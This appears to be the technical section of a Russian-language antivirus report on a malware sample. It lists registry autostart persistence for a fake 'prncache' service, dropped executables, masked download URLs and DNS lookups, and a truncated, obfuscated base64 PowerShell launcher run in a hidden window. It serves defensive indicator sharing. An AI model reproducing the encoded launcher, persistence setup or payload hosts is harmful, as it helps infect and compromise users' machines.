Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\prncache] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\prncache] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData003e\prncache.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH...
- %HOMEPATH%\988.exe
- %WINDIR%\syswow64\nlsdata003e\prncache.exe
- %HOMEPATH%\988.exe в %WINDIR%\syswow64\nlsdata003e\prncache.exe
- '17#.#44.135.2':80
- http://fi#####rcleanerstx.com/wp-content/mu-plugins/2CLid868/
- http://cr#.###ayanpharma.com/application/ffltO/
- http://cr#.###ayanpharma.com/cgi-sys/suspendedpage.cgi
- http://za###ajouk.com/cf9r4nd/Xsma350581/
- http://17#.#44.135.2/Np61lfDV/EpW0EYobJ0Jdl/qWbp/pR3FGe0SbuS3gMTIZ/WDYi/
- DNS ASK fi#####rcleanerstx.com
- DNS ASK bh####raexpress.com
- DNS ASK cr#.###ayanpharma.com
- DNS ASK za###ajouk.com
- '%HOMEPATH%\988.exe'
- '%WINDIR%\syswow64\nlsdata003e\prncache.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH...' (со скрытым окном)